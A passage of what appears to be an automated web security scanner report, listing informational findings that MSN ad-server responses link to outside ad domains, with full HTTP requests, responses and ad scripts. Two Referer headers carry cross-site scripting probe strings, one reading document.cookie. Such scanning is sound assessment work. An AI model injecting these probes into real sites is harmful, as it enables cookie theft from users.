GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNREC&AP=1089 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 758
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7417783-T8352780-C26000000000155956
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:32 GMT
Content-Length: 758

//<![CDATA[
function getRADIds() { return{"adid":"26000000000155956","pid":"7417783","targetid":"8352780"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003S/26000000000155956.1??PID=7417783&UIT=G&TargetID=8352780&AN=1361119510&PG=MSNREC&ASID=de331aa337944a769f55f1004dce6d4b" target="_blank"><img src="http://ads2.msads.net/CIS/119/000/000/000/012/553.jpg" width="300" height="250" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.266. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNSUR&AP=1089

The response contains the following link to another domain:

http://ads1.msads.net/ads/1/0000000001_000000000000000017246.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNSUR&AP=1089 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 404
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P3782944-T8338642-C521263
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:33 GMT
Content-Length: 404

//<![CDATA[
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 1, 1);}
document.write('<a href="http://g.redacted/0AD00004/521263.1??PID=3782944&UIT=G&TargetID=8338642&AN=2030584453&PG=MSNSUR" ><img src="http://ads1.msads.net/ads/1/0000000001_000000000000000017246.gif" width="1" height="1" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.267. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1

The response contains the following links to other domains:

http://clk.redcated/APM/go/139941180/direct;;wi.728;hi.90/01/
http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
http://redcated/APM/view/139941180/direct;;wi.728;hi.90/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2401
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P4529257-T37386205-C77000000000005928
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:24:17 GMT
Content-Length: 2401

//<![CDATA[
function getRADIds() { return{"adid":"77000000000005928","pid":"4529257","targetid":"37386205"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_135413821() {var adCode_135413821=new Array();adCode_135413821.push('<iframe src="http://view.atdmt.com/APM/iview/139941180/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_135413821.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_135413821.push('document.write(\'<a href="http://clk.atdmt.com/APM/go/139941180/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/APM/view/139941180/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

22.268. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402

The response contains the following links to other domains:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888
http://ads2.msads.net/CIS/79/000/000/000/008/787.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 961
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009935-T22841720-C4000000000033190
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:32 GMT
Content-Length: 961

//<![CDATA[
function getRADIds() { return{"adid":"4000000000033190","pid":"8009935","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003S/4000000000033190.1??PID=8009935&UIT=G&TargetID=22841720&AN=1209024888&PG=MSNHQ2&ASID=b376e427ee3847729d56e06610cc38a4" target="_blank"><img src="http://ads2.msads.net/CIS/79/000/000/000/008/787.gif" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

22.269. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetAd?PG=

The response contains the following link to another domain:

http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C43&R=

Request

GET /ADSAdClient31.dll?GetAd?PG= HTTP/1.1
Host: rad.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC01=FB=; FC02=FB=; CULTURE=EN-US; FC00=FB=AgEAVQ5AiKgB; Sample=63; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; FC07=FB=; FC08=FB=; FC09=FB=; FC03=FB=; FC04=FB=; FC05=FB=; CC=US; FC06=FB=; MUID=AD04D6F8B2FF44629973BD0674351135; mh=MSFT; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 89
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:57:12 GMT

<img src="http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C43&R="/>

22.270. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402

The response contains the following links to other domains:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1358.829.tk.100x25/956498424
http://ads2.msads.net/CIS/65/000/000/000/008/748.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 962
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009935-T22841720-C56000000000036466
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:46:33 GMT
Content-Length: 962

//<![CDATA[
function getRADIds() { return{"adid":"56000000000036466","pid":"8009935","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003S/56000000000036466.1??PID=8009935&UIT=G&TargetID=22841720&AN=956498424&PG=MSNHQ2&ASID=3d9b0f7f91734e77a00f20c624746190" target="_blank"><img src="http://ads2.msads.net/CIS/65/000/000/000/008/748.gif" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1358.829.tk.100x25/956498424" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

22.271. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QA&AP=1026

The response contains the following link to another domain:

http://ads2.msads.net/CIS/52/000/000/000/010/255.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 751
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C3000000000032324
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:23 GMT
Content-Length: 751

//<![CDATA[
function getRADIds() { return{"adid":"3000000000032324","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
try
...[SNIP]...
<a href="http://g.redacted/2AD0003L/3000000000032324.1??PID=8031597&UIT=G&TargetID=8247108&AN=1477462768&PG=INV4QA&ASID=24148a130c2d473cb5958654d4f1ed12" target="_blank"><img src="http://ads2.msads.net/CIS/52/000/000/000/010/255.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.272. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVHP1&AP=1089

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1181757&PG=INVHP1&ASID=4cd985aabf2445519529dc22f0228baa&destination=;ord=1181757?

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2751
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013958-T8395935-C18000000000034994
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 15:12:04 GMT
Content-Length: 2751

//<![CDATA[
function getRADIds() { return{"adid":"18000000000034994","pid":"8013958","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1181757() {var adCode_1181757=new Array();adCode_1181757.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1181757&PG=INVHP1&ASID=4cd985aabf2445519529dc22f0228baa&destination=;ord=1181757?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1181757.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.5;abr=!ie;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:/
...[SNIP]...

22.273. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVHP1&AP=1089

The response contains the following links to other domains:

http://clk.redcated/BEL/go/msnnksbu0010000337bel/direct;/01/
http://redcated/BEL/iview/msnnksbu0010000337bel/direct;/01?click=
http://redcated/BEL/view/msnnksbu0010000337bel/direct;/01/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2399
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8008908-T8395935-C26000000000153628
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 19:59:52 GMT
Content-Length: 2399

//<![CDATA[
function getRADIds() { return{"adid":"26000000000153628","pid":"8008908","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_840958461() {var adCode_840958461=new Array();adCode_840958461.push('<iframe src="http://view.atdmt.com/BEL/iview/msnnksbu0010000337bel/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_840958461.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_840958461.push('document.write(\'<a href="http://clk.atdmt.com/BEL/go/msnnksbu0010000337bel/direct;/01/" target="_blank"><img src="http://view.atdmt.com/BEL/view/msnnksbu0010000337bel/direct;/01/"/></a>
...[SNIP]...

22.274. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetAd?PG=

The response contains the following link to another domain:

http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C18&R=

Request

GET /ADSAdClient31.dll?GetAd?PG= HTTP/1.1
Host: rad.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC01=FB=; FC02=FB=; CULTURE=EN-US; FC00=FB=AgEAVQ5AiKgB; Sample=63; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; FC07=FB=; FC08=FB=; FC09=FB=; FC03=FB=; FC04=FB=; FC05=FB=; CC=US; FC06=FB=; MUID=AD04D6F8B2FF44629973BD0674351135; mh=MSFT; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 89
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:50:29 GMT

<img src="http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C18&R="/>

22.275. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVXTA&AP=1440

The response contains the following link to another domain:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1296
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8282372-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:10 GMT
Content-Length: 1296

//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.redacted/0AD00001/1686997.1?!&&PID=8282372&UIT=G&TargetID=30580561&AN=708002109&PG=INVXTA">$7 Online S
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

22.276. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNIF1&AP=1455

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227;sz=1x1;ord=1362758608?
http://ads2.msads.net/CIS/1/000/000/000/012/624.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNIF1&AP=1455 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 912
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8329208-T21144173-C37000000000038948
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:32 GMT
Content-Length: 912

//<![CDATA[
function getRADIds() { return{"adid":"37000000000038948","pid":"8329208","targetid":"21144173"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003S/37000000000038948.1??PID=8329208&UIT=G&TargetID=21144173&AN=1362758608&PG=MSNIF1&ASID=78bcba5895c24a899102dde9ee9822ff" target="_blank"><img src="http://ads2.msads.net/CIS/1/000/000/000/012/624.gif" width="300" height="60" alt="Click Here!" border="0" /></a>');document.write('<img src="http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227;sz=1x1;ord=1362758608?" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

22.277. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402

The response contains the following links to other domains:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1360528144
http://ads2.msads.net/CIS/110/000/000/000/005/545.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 964
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009935-T22841720-C83000000000035182
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:49:13 GMT
Content-Length: 964

//<![CDATA[
function getRADIds() { return{"adid":"83000000000035182","pid":"8009935","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003S/83000000000035182.1??PID=8009935&UIT=G&TargetID=22841720&AN=1360528144&PG=MSNHQ2&ASID=142ec5c109f54f0eb2f0dc40b42b6fa6" target="_blank"><img src="http://ads2.msads.net/CIS/110/000/000/000/005/545.jpg" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1360528144" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

22.278. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1

The response contains the following links to other domains:

